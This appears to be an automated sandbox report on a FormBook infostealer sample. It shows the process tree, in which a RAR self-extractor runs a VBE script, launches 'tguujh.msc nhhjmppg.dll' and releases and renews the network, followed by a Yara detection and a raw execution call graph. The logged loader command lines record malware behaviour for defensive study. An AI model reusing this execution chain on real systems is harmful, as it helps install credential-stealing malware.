                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:13:01:56
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\RarSFX0\hjca.vbe"
                                                            Imagebase:0x780000
                                                            File size:147'456 bytes
                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:13:02:06
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:13:02:07
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:13:02:07
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c tguujh.msc nhhjmppg.dll
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:13:02:07
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:13:02:07
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:ipconfig /release
                                                            Imagebase:0x2b0000
                                                            File size:29'184 bytes
                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:13:02:07
                                                            Start date:05/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc
                                                            Wow64 process (32bit):true
                                                            Commandline:tguujh.msc nhhjmppg.dll
                                                            Imagebase:0xc50000
                                                            File size:947'288 bytes
                                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 0%, ReversingLabs
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:14:20:48
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                            Imagebase:0x410000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:14:20:48
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff75da10000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:14:20:49
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:ipconfig /renew
                                                            Imagebase:0x2b0000
                                                            File size:29'184 bytes
                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:14:20:57
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0x790000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:14:20:57
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0x460000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2027536696.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2027256382.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:14:21:03
                                                            Start date:05/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user~1\AppData\Local\Temp\dsvk\TGUUJH~1.EXE" C:\Users\user~1\AppData\Local\Temp\dsvk\nhhjmppg.dll
                                                            Imagebase:0xbc0000
                                                            File size:947'288 bytes
                                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Antivirus matches:
                                                            • Detection: 0%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:14:21:11
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0x80000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:14:21:11
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0x3a0000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Target ID:21
                                                            Start time:14:21:11
                                                            Start date:05/12/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 80
                                                            Imagebase:0xad0000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:9.6%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:11.1%
                                                              Total number of Nodes:1899
                                                              Total number of Limit Nodes:27
29193->29196 29200 991a66 26 API calls 29196->29200 29197 9b0ce0 29312 99ddc7 29197->29312 29198 9b0cd5 GetLastError 29198->29197 29205 9b0ff6 29200->29205 29209 9b0e05 _wcslen 29201->29209 29204 9b1d4f 48 API calls 29207 9b10ce 29204->29207 29216 9a4318 53 API calls 29205->29216 29354 9b3c78 29207->29354 29438 9b0405 5 API calls 2 library calls 29209->29438 29211 991a66 26 API calls 29211->29214 29213 9b0e23 29439 9b0405 5 API calls 2 library calls 29213->29439 29214->29150 29214->29151 29215 9b1d4f 48 API calls 29226 9b10ef 29215->29226 29218 9b100c 29216->29218 29221 9914a7 28 API calls 29218->29221 29219 9b0e2f 29440 9b0405 5 API calls 2 library calls 29219->29440 29220 9b1110 29448 991cc4 GetDlgItem KiUserCallbackDispatcher 29220->29448 29224 9b1015 29221->29224 29231 991a66 26 API calls 29224->29231 29225 9b0e3b 29441 9a5109 114 API calls 29225->29441 29226->29220 29229 9b1d4f 48 API calls 29226->29229 29227 9b0af5 29227->29054 29227->29163 29229->29220 29230 9b0e4e 29442 9b3e53 28 API calls __EH_prolog3 29230->29442 29234 9b1031 29231->29234 29233 9b0e6b CreateFileMappingW 29235 9b0e9d MapViewOfFile 29233->29235 29236 9b0ed5 ShellExecuteExW 29233->29236 29237 991a66 26 API calls 29234->29237 29238 9b0ed2 __InternalCxxFrameHandler 29235->29238 29239 9b0ef3 29236->29239 29237->29163 29238->29236 29240 9b0f3d 29239->29240 29241 9b0f00 WaitForInputIdle 29239->29241 29244 9b0f73 29240->29244 29245 9b0f60 UnmapViewOfFile CloseHandle 29240->29245 29242 9b0f1e 29241->29242 29242->29240 29243 9b0f23 Sleep 29242->29243 29243->29240 29243->29242 29443 992e8b 29244->29443 29245->29244 29248 991a66 26 API calls 29249 9b0f83 29248->29249 29250 991a66 26 API calls 29249->29250 29251 9b0f8e 29250->29251 29251->29152 29253 991e4d 29252->29253 29254 991ea6 29252->29254 29256 991eb3 29253->29256 29454 9a3eaa 64 API calls 3 library calls 29253->29454 29455 9a3e83 GetWindowLongW SetWindowLongW 29254->29455 29256->29010 29256->29011 29256->29059 29258 991e6f 29258->29256 29259 
991e82 GetDlgItem 29258->29259 29259->29256 29260 991e92 29259->29260 29260->29256 29261 991e98 SetWindowTextW 29260->29261 29261->29256 29456 9b57d8 29262->29456 29264 991cee GetDlgItem 29265 991d0b 29264->29265 29266 991d1d 29264->29266 29267 9914a7 28 API calls 29265->29267 29457 991d64 29266->29457 29269 991d18 29267->29269 29270 991d4d 29269->29270 29271 991a66 26 API calls 29269->29271 29272 991d5a 29270->29272 29273 991a66 26 API calls 29270->29273 29271->29270 29274 9b5787 5 API calls 29272->29274 29273->29272 29275 991d61 29274->29275 29275->29037 29275->29163 29275->29227 29281 99eaff __EH_prolog3_GS 29276->29281 29277 99eb09 29278 9b5787 5 API calls 29277->29278 29279 99ebb6 29278->29279 29279->29118 29279->29119 29280 99eb84 29280->29277 29282 99efef 54 API calls 29280->29282 29281->29277 29281->29280 29283 99769f 45 API calls 29281->29283 29285 991a66 26 API calls 29281->29285 29470 99efef 29281->29470 29282->29277 29283->29281 29285->29281 29287 9a2232 SetCurrentDirectoryW 29286->29287 29288 9a2230 29286->29288 29287->29133 29288->29287 29290 993280 29289->29290 29504 992f0f 29290->29504 29293 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29294 99329d 29293->29294 29295 992f45 29294->29295 29296 992f55 _wcslen 29295->29296 29508 995962 29296->29508 29298 992f63 29298->29174 29302 99dea6 __EH_prolog3_GS 29299->29302 29300 99def4 29303 9a169a 47 API calls 29300->29303 29310 99df9e 29300->29310 29301 99df09 CreateFileW 29301->29300 29302->29300 29302->29301 29304 99df49 29303->29304 29306 99df6e 29304->29306 29308 99df59 CreateFileW 29304->29308 29309 99df56 29304->29309 29305 9b5787 5 API calls 29307 99dfdf 29305->29307 29306->29310 29517 9919a9 26 API calls 29306->29517 29307->29197 29307->29198 29308->29306 29309->29308 29310->29305 29313 99ddf8 29312->29313 29314 99de09 29312->29314 29313->29314 29316 99de0b 29313->29316 29317 99de04 29313->29317 29315 991a66 26 API calls 29314->29315 29318 99de18 29315->29318 29523 99de50 
29316->29523 29518 99dfe2 29317->29518 29318->29211 29321->29162 29322->29176 29323->29189 29341 9b1d5e __EH_prolog3_GS 29324->29341 29326 9b349a 29327 991a66 26 API calls 29326->29327 29328 9b34a5 29327->29328 29329 9b5787 5 API calls 29328->29329 29330 9b10c5 29329->29330 29330->29204 29331 99769f 45 API calls 29331->29341 29332 9925a4 26 API calls 29332->29341 29333 9914a7 28 API calls 29333->29341 29335 991a66 26 API calls 29335->29341 29337 9a645a 28 API calls 29337->29341 29339 9b34ad 29549 9958cb 45 API calls 29339->29549 29341->29326 29341->29331 29341->29332 29341->29333 29341->29335 29341->29337 29341->29339 29544 9a62cd 30 API calls 2 library calls 29341->29544 29545 9af5b2 28 API calls 29341->29545 29546 99adaa CompareStringW 29341->29546 29547 9b44c0 26 API calls 29341->29547 29548 9b030a 28 API calls 29341->29548 29355 9b3c87 __EH_prolog3_catch_GS _wcslen 29354->29355 29550 9a6a89 29355->29550 29357 9b3cba 29554 997903 29357->29554 29366 9b5796 5 API calls 29367 9b10e0 29366->29367 29367->29215 30398 9aeaa6 29368->30398 29371 9b37bf GetWindow 29372 9b37d8 29371->29372 29375 9b3885 29371->29375 29372->29375 29376 9b37e5 GetClassNameW 29372->29376 29378 9b3809 GetWindowLongW 29372->29378 29379 9b386d GetWindow 29372->29379 29373 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29374 9b1266 29373->29374 29374->29019 29374->29020 29375->29373 30403 9a8da4 CompareStringW 29376->30403 29378->29379 29380 9b3819 SendMessageW 29378->29380 29379->29372 29379->29375 29380->29379 29381 9b382f GetObjectW 29380->29381 30404 9aeae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29381->30404 29383 9b3846 30405 9aeac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29383->30405 30406 9aef21 13 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29383->30406 29386 9b3857 SendMessageW DeleteObject 29386->29379 29388 991e0f 29387->29388 29389 991e11 SetWindowTextW 29387->29389 29388->29389 29389->29044 29391 9af2f9 29390->29391 29392 9af31e 29390->29392 30409 
9a8da4 CompareStringW 29391->30409 29394 9af32c 29392->29394 29395 9af323 SHAutoComplete 29392->29395 29397 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29394->29397 29395->29394 29396 9af30c 29396->29392 29398 9af310 FindWindowExW 29396->29398 29399 9af337 29397->29399 29398->29392 29400 9afdd1 29399->29400 29401 9afded 29400->29401 29402 9920b0 30 API calls 29401->29402 29403 9afe27 29402->29403 30410 992dbb 29403->30410 29406 9afe4c 30417 99278b 29406->30417 29407 9afe43 29408 99232c 123 API calls 29407->29408 29410 9afe48 29408->29410 29413 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29410->29413 29412 99232c 123 API calls 29412->29410 29414 9afe77 29413->29414 29414->29075 29414->29078 29415->29040 29416->29059 29418 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29417->29418 29419 9b57a0 29418->29419 29419->29419 29421 9b0678 5 API calls 29420->29421 29422 9b358d GetDlgItem 29421->29422 29423 9b35ac 29422->29423 29424 9b35e4 SendMessageW SendMessageW 29422->29424 29429 9b35b7 ShowWindow SendMessageW SendMessageW 29423->29429 29425 9b3643 SendMessageW 29424->29425 29426 9b3624 29424->29426 29427 9b365b 29425->29427 29428 9b365d SendMessageW SendMessageW 29425->29428 29426->29425 29427->29428 29430 9b367f SendMessageW 29428->29430 29431 9b36a2 SendMessageW 29428->29431 29429->29424 29430->29431 29432 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29431->29432 29433 9b36c0 29432->29433 29433->29074 29434->29071 29435->29093 29436->29100 29437->29183 29438->29213 29439->29219 29440->29225 29441->29230 29442->29233 29444 992ea0 29443->29444 29445 992e93 29443->29445 29444->29248 29446 9912a7 26 API calls 29445->29446 29446->29444 29447->29170 29448->29227 29449->29132 29450->29108 29451->29134 29452->29122 29453->29104 29454->29258 29455->29256 29456->29264 29468 9b57d8 29457->29468 29459 991d70 GetWindowTextLengthW 29469 991bbd 28 API calls 29459->29469 29461 991dab GetWindowTextW 29462 9914a7 28 
API calls 29461->29462 29463 991dca 29462->29463 29464 991ddd 29463->29464 29465 9912a7 26 API calls 29463->29465 29466 9b5787 5 API calls 29464->29466 29465->29464 29467 991de4 29466->29467 29467->29269 29468->29459 29469->29461 29471 99effb __EH_prolog3_GS 29470->29471 29472 99f02f 29471->29472 29473 99f01b CreateDirectoryW 29471->29473 29474 99ed0d 49 API calls 29472->29474 29473->29472 29475 99f0d0 29473->29475 29476 99f03b 29474->29476 29477 99f0df 29475->29477 29489 99f58b 29475->29489 29478 99f0e3 GetLastError 29476->29478 29480 9a169a 47 API calls 29476->29480 29482 9b5787 5 API calls 29477->29482 29478->29477 29481 99f063 29480->29481 29483 99f07d 29481->29483 29485 99f070 29481->29485 29486 99f073 CreateDirectoryW 29481->29486 29484 99f100 29482->29484 29488 99f0ad 29483->29488 29502 9919a9 26 API calls 29483->29502 29484->29281 29485->29486 29486->29483 29488->29475 29488->29478 29490 99f597 __EH_prolog3_GS 29489->29490 29491 99f5a4 SetFileAttributesW 29490->29491 29492 99f5b7 29491->29492 29501 99f622 29491->29501 29494 9a169a 47 API calls 29492->29494 29493 9b5787 5 API calls 29495 99f638 29493->29495 29496 99f5d7 29494->29496 29495->29477 29497 99f5e4 29496->29497 29498 99f5e7 SetFileAttributesW 29496->29498 29499 99f5f6 29496->29499 29497->29498 29498->29499 29499->29501 29503 9919a9 26 API calls 29499->29503 29501->29493 29502->29488 29503->29501 29505 992f2f 29504->29505 29506 992f26 29504->29506 29507 99120c 28 API calls 29505->29507 29506->29293 29507->29506 29509 995a3a 29508->29509 29510 995975 29508->29510 29516 9958cb 45 API calls 29509->29516 29514 995987 29510->29514 29515 993029 28 API calls 29510->29515 29514->29298 29515->29514 29517->29310 29519 99dfeb 29518->29519 29520 99e015 29518->29520 29519->29520 29529 99ec63 29519->29529 29520->29314 29524 99de76 29523->29524 29525 99de5c 29523->29525 29526 99de95 29524->29526 29543 99925b 109 API calls 29524->29543 29525->29524 29527 99de68 CloseHandle 29525->29527 29526->29314 29527->29524 
29530 99ec6f __EH_prolog3_GS 29529->29530 29531 99ec7c DeleteFileW 29530->29531 29532 99ec8c 29531->29532 29540 99ecf4 29531->29540 29534 9a169a 47 API calls 29532->29534 29533 9b5787 5 API calls 29535 99e013 29533->29535 29536 99ecac 29534->29536 29535->29314 29537 99ecc8 29536->29537 29538 99ecb9 29536->29538 29539 99ecbc DeleteFileW 29536->29539 29537->29540 29542 9919a9 26 API calls 29537->29542 29538->29539 29539->29537 29540->29533 29542->29540 29543->29526 29544->29341 29545->29341 29546->29341 29547->29341 29548->29341 29551 9a6a99 _wcslen 29550->29551 29552 991be3 28 API calls 29551->29552 29553 9a6abb 29552->29553 29553->29357 29555 9a6a74 29554->29555 29556 9a6a89 28 API calls 29555->29556 29557 9a6a86 29556->29557 29558 99b03d 29557->29558 29559 99b049 __EH_prolog3_GS 29558->29559 29605 9a2815 29559->29605 29561 99b092 29611 99b231 29561->29611 29564 991a66 26 API calls 29565 99b120 29564->29565 29566 991a66 26 API calls 29565->29566 29567 99b128 29566->29567 29568 9b56f6 28 API calls 29567->29568 29569 99b13f 29568->29569 29616 9aa599 29569->29616 29571 99b172 29572 9b5787 5 API calls 29571->29572 29573 99b179 29572->29573 29574 99b3e1 29573->29574 29575 99b3ed __EH_prolog3_GS 29574->29575 29576 99b478 29575->29576 29579 99b484 29575->29579 29656 99f711 29575->29656 29577 991a66 26 API calls 29576->29577 29577->29579 29584 99b4e0 29579->29584 29623 99bc65 29579->29623 29580 99b529 29581 9b5787 5 API calls 29580->29581 29583 99b543 29581->29583 29586 99b194 29583->29586 29584->29580 29663 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29584->29663 30342 99d6bc 29586->30342 29589 991a66 26 API calls 29591 99b1e8 29589->29591 29593 991a66 26 API calls 29591->29593 29592 99b1d0 29592->29589 29594 99b1f3 29593->29594 29595 991a66 26 API calls 29594->29595 29596 99b1fe 29595->29596 30356 9a28aa 29596->30356 29598 99b206 29599 991a66 26 API calls 29598->29599 29600 99b20e 29599->29600 29601 991a66 26 API calls 29600->29601 29602 99b216 
29601->29602 29603 99d869 26 API calls 29602->29603 29604 99b21d 29603->29604 29604->29366 29606 9a2821 __EH_prolog3 29605->29606 29607 9b56f6 28 API calls 29606->29607 29609 9a285f 29607->29609 29608 9b56f6 28 API calls 29610 9a2883 29608->29610 29609->29608 29610->29561 29612 9925a4 26 API calls 29611->29612 29613 99b23f 29612->29613 29614 9925a4 26 API calls 29613->29614 29615 99b118 29614->29615 29615->29564 29617 9aa5a5 __EH_prolog3 29616->29617 29618 9b56f6 28 API calls 29617->29618 29619 9aa5bf 29618->29619 29620 9aa5d6 29619->29620 29622 9a7445 112 API calls 29619->29622 29620->29571 29622->29620 29624 99bc80 29623->29624 29664 9920b0 29624->29664 29626 99bca7 29627 99bcba 29626->29627 29886 99e910 29626->29886 29631 99bcec 29627->29631 29674 9927e0 29627->29674 29630 99bce8 29630->29631 29698 992d41 160 API calls __EH_prolog3_GS 29630->29698 29863 99232c 29631->29863 29636 99bd14 29638 99be08 29636->29638 29639 997673 28 API calls 29636->29639 29699 99bec2 7 API calls 29638->29699 29641 99bd36 29639->29641 29890 9a1e54 46 API calls 2 library calls 29641->29890 29643 99be16 29645 99be76 29643->29645 29700 9a864f 29643->29700 29644 99f711 53 API calls 29653 99bd53 29644->29653 29645->29631 29703 9952d8 29645->29703 29715 99bf3d 29645->29715 29646 99bde8 29649 991a66 26 API calls 29646->29649 29651 99bded 29649->29651 29650 991a66 26 API calls 29650->29653 29654 991a66 26 API calls 29651->29654 29653->29644 29653->29646 29653->29650 29891 9a1e54 46 API calls 2 library calls 29653->29891 29654->29638 29657 9a1a9f 5 API calls 29656->29657 29659 99f723 29657->29659 29658 99f74b 29658->29575 29659->29658 30317 99f826 29659->30317 29662 99f738 FindClose 29662->29658 29663->29580 29665 9920bc __EH_prolog3 29664->29665 29666 9a2815 28 API calls 29665->29666 29667 9920e8 29666->29667 29668 9b56f6 28 API calls 29667->29668 29672 992193 29667->29672 29669 992180 29668->29669 29669->29672 29892 9976e7 29669->29892 29900 9a026f 29672->29900 29673 992227 __cftof 
29673->29626 29675 9927ec __EH_prolog3 29674->29675 29676 992838 29675->29676 29695 99298b 29675->29695 29914 9911dd 29675->29914 29678 9929a9 29676->29678 29682 9929b6 29676->29682 29923 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29678->29923 29680 9952d8 133 API calls 29685 9929f4 29680->29685 29681 992882 29696 99e850 111 API calls 29681->29696 29682->29680 29682->29695 29683 992a3c 29687 992a6f 29683->29687 29683->29695 29924 99204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29683->29924 29685->29683 29686 9952d8 133 API calls 29685->29686 29686->29685 29687->29695 29697 99e850 111 API calls 29687->29697 29688 992995 29690 992e8b 26 API calls 29688->29690 29689 992986 29691 992e8b 26 API calls 29689->29691 29690->29676 29691->29695 29692 9928ad 29692->29688 29692->29689 29693 9952d8 133 API calls 29694 992ac0 29693->29694 29694->29693 29694->29695 29695->29630 29696->29692 29697->29694 29698->29636 29699->29643 29927 9b4300 29700->29927 29704 9952e8 29703->29704 29705 9952e4 29703->29705 29714 99e850 111 API calls 29704->29714 29705->29645 29706 9952fa 29707 995323 29706->29707 29708 995315 29706->29708 29954 993d9d 131 API calls 3 library calls 29707->29954 29710 995355 29708->29710 29953 9948aa 118 API calls 2 library calls 29708->29953 29710->29645 29712 995321 29712->29710 29955 99344b 89 API calls 29712->29955 29714->29706 29716 99bf95 29715->29716 29722 99bfc4 29716->29722 29781 99c2fd 29716->29781 30053 9acdb4 135 API calls __EH_prolog3_GS 29716->30053 29717 99d2e5 29720 99d2ea 29717->29720 29721 99d331 29717->29721 29719 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29723 99d327 29719->29723 29720->29781 30124 99ab88 185 API calls 29720->30124 29721->29781 30125 9acdb4 135 API calls __EH_prolog3_GS 29721->30125 29722->29717 29725 99bfeb 29722->29725 29722->29781 29723->29645 29725->29781 29956 997e1b 29725->29956 29728 99c0c8 29968 9a106b 29728->29968 29732 99c151 29736 99c16f 29732->29736 30055 9a2095 45 
API calls __EH_prolog3_GS 29732->30055 29734 99c269 29743 99c29b 29734->29743 30056 9919a9 26 API calls 29734->30056 29735 99d205 29737 99c948 29735->29737 29775 99c743 29735->29775 29762 99c239 29736->29762 30058 9a0ddb 28 API calls 29736->30058 29752 99c97a 29737->29752 30091 9919a9 26 API calls 29737->30091 29739 99c374 29739->29735 29740 99c3ea 29739->29740 29741 99c3cf 29739->29741 29756 99c409 29740->29756 30060 99b92d 56 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29740->30060 29744 991a66 26 API calls 29741->29744 29743->29781 30057 9919a9 26 API calls 29743->30057 29749 99c3da 29744->29749 29754 991a66 26 API calls 29749->29754 29751 99d276 29751->29781 30123 9919a9 26 API calls 29751->30123 29752->29781 30092 9919a9 26 API calls 29752->30092 29754->29781 29755 99c4ea 29978 99b2ee 29755->29978 29756->29755 29758 99f711 53 API calls 29756->29758 29757 99c33d _wcslen 30059 99f103 52 API calls 2 library calls 29757->30059 29769 99c49b 29758->29769 29762->29734 29762->29739 29763 99c5c2 29764 99c7d8 29763->29764 29768 99c5cf 29763->29768 30069 9a2a36 115 API calls 29764->30069 29765 991a66 26 API calls 29765->29755 29805 99c62c 29768->29805 30063 9957c0 28 API calls 2 library calls 29768->30063 29769->29765 29772 99c501 29779 99c551 29772->29779 30061 9919a9 26 API calls 29772->30061 29773 99c8f0 29782 99c9eb 29773->29782 29799 99c8ff 29773->29799 29774 99c830 29774->29773 29783 99c859 29774->29783 29775->29751 30122 9919a9 26 API calls 29775->30122 29779->29781 30062 9919a9 26 API calls 29779->30062 29781->29719 29795 99c874 29782->29795 29984 99b345 29782->29984 29788 99ed0d 49 API calls 29783->29788 29790 99ca64 29783->29790 29783->29795 29784 99c940 29785 99ddc7 114 API calls 29784->29785 29785->29737 29787 99d1f2 29791 99ddc7 114 API calls 29787->29791 29792 99c8b3 29788->29792 29789 99ca01 29793 99ca05 29789->29793 29990 99b778 29789->29990 29790->29787 29815 99cac5 29790->29815 30093 99e152 29790->30093 29791->29735 29792->29795 30071 99d8b8 
29792->30071 29796 99ddc7 114 API calls 29793->29796 29795->29790 29795->29793 29800 99b345 90 API calls 29795->29800 29796->29775 29799->29784 30090 99b544 144 API calls __EH_prolog3_GS 29799->30090 29807 99ca5e 29800->29807 29803 99cb15 29809 99fd70 28 API calls 29803->29809 29804 99c77a 30068 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29804->30068 29805->29775 29805->29804 29811 99c781 29805->29811 30064 99b015 28 API calls 29805->30064 30065 9a2a36 115 API calls 29805->30065 30066 9932d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29805->30066 30067 99b8ed 89 API calls 29805->30067 29807->29790 29807->29793 29826 99cb2f 29809->29826 29811->29774 30070 99ede9 119 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29811->30070 29813 99cab7 30097 999653 109 API calls 29813->30097 30020 99fd70 29815->30020 29816 99cc21 29817 99cf27 29816->29817 29818 99cc76 29816->29818 29820 99cf39 29817->29820 29821 99cf50 29817->29821 29844 99ccb5 29817->29844 29819 99cd33 29818->29819 29823 99cc94 29818->29823 30101 9a22b9 28 API calls 29819->30101 30108 99d771 29820->30108 30024 9a9625 29821->30024 29828 99ccd8 29823->29828 29836 99cca3 29823->29836 29826->29816 30098 99e39d 8 API calls 29826->30098 29827 99cd69 29830 9a106b 45 API calls 29827->29830 29828->29844 30100 99a7a2 142 API calls 29828->30100 29829 99cf73 30040 9a94ea 29829->30040 29834 99cd76 29830->29834 30102 99b92d 56 API calls 